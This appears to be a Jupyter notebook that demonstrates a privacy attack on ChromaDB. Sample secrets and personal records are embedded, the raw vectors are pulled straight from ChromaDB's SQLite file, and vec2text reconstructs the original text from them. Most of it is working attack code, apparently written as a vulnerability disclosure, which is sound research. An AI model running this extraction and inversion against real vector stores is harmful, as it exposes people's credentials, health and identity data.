# ChromaDB + Vec2Text Vulnerability Demonstration

This notebook demonstrates how sensitive text stored in ChromaDB can be reconstructed from its stored embeddings using vec2text.
 
### Attack Chain:
1. Sensitive texts → OpenAI embeddings → ChromaDB storage
2. Extract embeddings from SQLite database
3. Use vec2text to reconstruct original sensitive text

In [None]:
import vec2text
import torch
from openai import OpenAI
import chromadb
import sqlite3
import struct
import numpy as np
import json
import time
import os
from pathlib import Path

# OpenAI setup
# The client is built without arguments, so no credential is written into the
# notebook (presumably it is read from the environment -- confirm locally).
embedding_model = "text-embedding-ada-002"
client = OpenAI()

# Load vec2text corrector for inversion.
# The corrector is loaded with the same model name that is used for the
# embedding requests, so the two cannot silently drift apart.
print(f"Loading vec2text corrector for OpenAI {embedding_model}...")
corrector = vec2text.load_pretrained_corrector(embedding_model)

# ChromaDB setup
persist_directory = "./chromadb_vuln_demo"
chroma_client = chromadb.PersistentClient(path=persist_directory)

# Create or reset collection
try:
    chroma_client.delete_collection("sensitive_docs")
except Exception as exc:
    # Best-effort reset: on a fresh store there is nothing to delete.
    # `Exception` (not a bare `except`) keeps KeyboardInterrupt/SystemExit
    # working, and the reason is reported instead of being swallowed.
    # If the delete failed for a real reason, create_collection below raises.
    print(f"Skipping collection reset ({type(exc).__name__}: {exc})")
collection = chroma_client.create_collection("sensitive_docs")

print(f"ChromaDB storage location: {persist_directory}")

In [None]:
# 2. Sensitive Test Corpus (same as vec2text demo)

# The corpus is assembled from one list per category. The final order is
# financial/identity first, then medical, then personal.
_financial_identity_docs = [
    "My social security number is 818-88-8118",
    "Password for admin account is SecurePass123!",
    "Credit card number 4532-1234-5678-9012 expires next month",
    "API key for production: sk-proj-1234567890abcdef",
    "Bank account routing number 021000021 checking 1234567890",
]

_medical_docs = [
    "Patient diagnosed with Type 2 diabetes, prescribed metformin",
    "Blood test results show cholesterol level of 277 mg/dL",
]

_personal_docs = [
    "John Doe lives at 1 World Trade Center, New York, NY 10007",
    "Phone number +1(212) 653-0688; email info@cyborg.co",
]

sensitive_documents = [
    *_financial_identity_docs,
    *_medical_docs,
    *_personal_docs,
]

print(f"Testing with {len(sensitive_documents)} sensitive documents")

In [None]:
# 3. Generate OpenAI Embeddings and Store in ChromaDB

def get_embeddings_openai(text_list):
    """Get embeddings from OpenAI API.

    Sends ``text_list`` in a single request through the module-level
    ``client``, using the module-level ``embedding_model``.

    Args:
        text_list: Sequence of texts to embed.

    Returns:
        A list holding the ``embedding`` of every item in the response's
        ``data``, or an empty list when ``text_list`` is empty.
    """
    print(f"Generating embeddings for {len(text_list)} texts...")
    # Nothing to embed: return early instead of sending an empty request.
    if len(text_list) == 0:
        return []
    response = client.embeddings.create(
        input=text_list,
        model=embedding_model,
        encoding_format="float",
    )
    return [e.embedding for e in response.data]

# Get embeddings
embeddings = get_embeddings_openai(sensitive_documents)
print(f"Generated {len(embeddings)} embeddings of dimension {len(embeddings[0])}")

# Store in ChromaDB: build the per-document ids and metadata first, then hand
# documents, vectors, ids and metadata to the collection in one call.
doc_ids = []
doc_metadatas = []
for i in range(len(sensitive_documents)):
    doc_ids.append(f"sensitive_doc_{i}")
    doc_metadatas.append({"type": "sensitive", "doc_num": i})

collection.add(
    ids=doc_ids,
    embeddings=embeddings,
    metadatas=doc_metadatas,
    documents=sensitive_documents,
)

In [None]:
# 4. Extract Embeddings from ChromaDB SQLite Database

print("\n=== EXTRACTING EMBEDDINGS FROM CHROMADB DATABASE ===")

# Connect to ChromaDB's SQLite database
db_path = os.path.join(persist_directory, "chroma.sqlite3")

# sqlite3.connect() silently creates an empty database when the file is
# missing, which would only surface later as a confusing "no such table"
# error, so fail early with a clear message instead.
if not os.path.isfile(db_path):
    raise FileNotFoundError(f"ChromaDB SQLite file not found: {db_path}")

conn = sqlite3.connect(db_path)
try:
    cursor = conn.cursor()
    print(f"Connected to SQLite database: {db_path}")

    # Get embedding data from database
    cursor.execute("SELECT * FROM embeddings_queue ORDER BY seq_id")
    rows = cursor.fetchall()
finally:
    # All rows are already in memory; release the file handle even if the
    # query failed.
    conn.close()

print(f"Found {len(rows)} embedding records in database")

# Extract embeddings and documents
extracted_embeddings = []
extracted_documents = []

for i, row in enumerate(rows):
    # Parse the row structure.
    # NOTE(review): the positional indices assume the embeddings_queue column
    # order of the ChromaDB version that wrote this file -- confirm after any
    # ChromaDB upgrade.
    doc_id = row[4]  # Document ID
    embedding_blob = row[5]  # Binary embedding data
    metadata_json = row[7]  # JSON metadata

    # A record without a vector cannot be inverted; skip it instead of
    # crashing on len(None).
    if embedding_blob is None:
        print(f"Skipping record {i+1}: {doc_id} (no embedding stored)")
        continue

    # Parse metadata to get original document (metadata may be absent)
    metadata = json.loads(metadata_json) if metadata_json else {}
    original_doc = metadata.get('chroma:document', 'Unknown')

    # Parse embedding blob (FLOAT32 binary data, 4 bytes per value)
    num_floats = len(embedding_blob) // 4
    embedding_values = struct.unpack(f'{num_floats}f', embedding_blob)

    extracted_embeddings.append(list(embedding_values))
    extracted_documents.append(original_doc)

    print(f"Extracted embedding {i+1}: {doc_id}")

print(f"\nSuccessfully extracted {len(extracted_embeddings)} embeddings from database")

In [None]:
# 5. Convert to PyTorch & Invert Each Embedding

print("\n=== RUNNING VEC2TEXT INVERSION ON EXTRACTED EMBEDDINGS ===")

# Choose the accelerator: MPS is preferred over CUDA; None means the tensor
# stays on the device where torch.tensor() creates it.
if torch.backends.mps.is_available():
    accelerator = 'mps'
elif torch.cuda.is_available():
    accelerator = 'cuda'
else:
    accelerator = None

# Convert to PyTorch tensor and move it to the chosen device
embeddings_tensor = torch.tensor(extracted_embeddings, dtype=torch.float32)
if accelerator is not None:
    embeddings_tensor = embeddings_tensor.to(accelerator)

print(f"Embeddings tensor shape: {embeddings_tensor.shape}")
print(f"Device: {embeddings_tensor.device}")

results = []

heavy_rule = "="*80
light_rule = "-" * 80

print("\n" + heavy_rule)
print("INVERSION RESULTS")
print(heavy_rule)

doc_embedding_pairs = zip(extracted_documents, embeddings_tensor)
for i, (original_doc, embedding) in enumerate(doc_embedding_pairs):
    print(f"\nDocument #{i+1}:")
    print(f"\nOriginal (from database): {original_doc}")

    # Time only the inversion call itself
    start_time = time.time()
    reconstructed = vec2text.invert_embeddings(
        embeddings=embedding.unsqueeze(0),  # Add batch dimension
        corrector=corrector,
        num_steps=20,
        sequence_beam_width=1,
    )[0]
    inversion_time = time.time() - start_time

    print(f"Reconstructed: {reconstructed}")

    # Similarity: re-embed the reconstructed text and compare it with the
    # extracted embedding on the CPU.
    new_emb_tensor = torch.tensor(get_embeddings_openai([reconstructed])[0])
    similarity = torch.nn.functional.cosine_similarity(
        embedding.cpu(),
        new_emb_tensor,
        dim=0,
    ).item()

    # Exact match ignores case and surrounding whitespace
    normalized_original = original_doc.lower().strip()
    normalized_reconstructed = reconstructed.lower().strip()
    exact_match = normalized_original == normalized_reconstructed

    print(f"Similarity: {similarity:.4f}")
    print(f"Inversion time: {inversion_time:.2f}s")
    print(f"Exact match: {exact_match}")

    results.append(dict(
        original=original_doc,
        reconstructed=reconstructed,
        similarity=similarity,
        time=inversion_time,
        exact_match=exact_match,
    ))

    print(light_rule)

In [None]:
# 6. Summary Analysis

# Cosine similarity above which a reconstruction counts as "high similarity"
HIGH_SIMILARITY_THRESHOLD = 0.95


def _percent(count, total):
    """Return ``count`` as a percentage of ``total`` (0.0 when ``total`` is 0)."""
    return count / total * 100 if total else 0.0


print("\n" + "="*80)
print("VULNERABILITY SUMMARY")
print("="*80)

total_docs = len(results)
exact_matches = sum(1 for r in results if r['exact_match'])
high_similarity = sum(1 for r in results if r['similarity'] > HIGH_SIMILARITY_THRESHOLD)
# The inversion loop stores no 'sensitive_recovered' key in its result dicts,
# so indexing it directly raises KeyError. Honour the key when a producer does
# supply it; otherwise count a document as recovered when it was reconstructed
# exactly or with high similarity.
sensitive_recovered = sum(
    1 for r in results
    if r.get(
        'sensitive_recovered',
        r['exact_match'] or r['similarity'] > HIGH_SIMILARITY_THRESHOLD,
    )
)

print(f"Total documents processed: {total_docs}")
print(f"Exact reconstructions: {exact_matches} ({_percent(exact_matches, total_docs):.1f}%)")
print(f"High similarity (>95%): {high_similarity} ({_percent(high_similarity, total_docs):.1f}%)")

# np.mean of an empty list warns and returns nan; report nan explicitly when
# there are no results.
avg_similarity = np.mean([r['similarity'] for r in results]) if results else float('nan')
avg_time = np.mean([r['time'] for r in results]) if results else float('nan')

print(f"Average similarity: {avg_similarity:.4f}")
print(f"Average inversion time: {avg_time:.2f}s")

print("\nATTACK CHAIN COMPLETE:")
print("   1. Stored sensitive data in ChromaDB")
print("   2. Extracted embeddings from SQLite database")
print(f"   3. Reconstructed {sensitive_recovered}/{total_docs} sensitive documents")